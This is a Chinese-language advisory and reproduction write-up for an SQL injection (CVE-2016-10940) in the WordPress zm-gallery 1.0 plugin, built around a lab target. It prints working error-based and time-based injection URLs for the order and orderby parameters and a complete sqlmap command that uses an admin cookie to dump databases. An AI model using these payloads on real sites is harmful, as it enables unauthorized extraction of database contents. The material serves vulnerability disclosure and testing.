简介
WordPress是WordPress基金会的一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress zm-gallery插件1.0版本中存在SQL注入漏洞。该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。
影响版本
WordPress zm-gallery 1.0
复现过程
使用https://github.com/cckuailong/reapoc/tree/main/2016/CVE-2016-10940/vultarget 漏洞环境,搭建完成后如下所示:
首先需要admin用户登录
Poc如下,漏洞点在order参数和orderby参数上
http://ip/wp-admin/admin.php?page=zm_gallery&orderby=name&order=desc,EXTRACTVALUE(4626,CONCAT(0x5c,0x7162627871,(SELECT (ELT(4626=4626,1))),0x7171627871))
http://ip/wp-admin/admin.php?page=zm_gallery&orderby=name AND (SELECT 6604 FROM (SELECT(SLEEP(5)))crSa)&order=desc
或者使用sqlmap一把梭:(需要admin用户的cookie)
python sqlmap.py -u "http://ip/wp-admin/admin.php?page=zm_gallery&orderby=name&order=desc" --dbs --cookie="cookie of admin user" --level=5 --dbms=mysql
风险危害
获取数据库敏感信息
处置建议
目前厂商暂未发布修复措施解决此安全问题,建议使用此软件的用户随时关注厂商主页或参考网址以获取解决办法:https://wordpress.org/plugins/zm-gallery/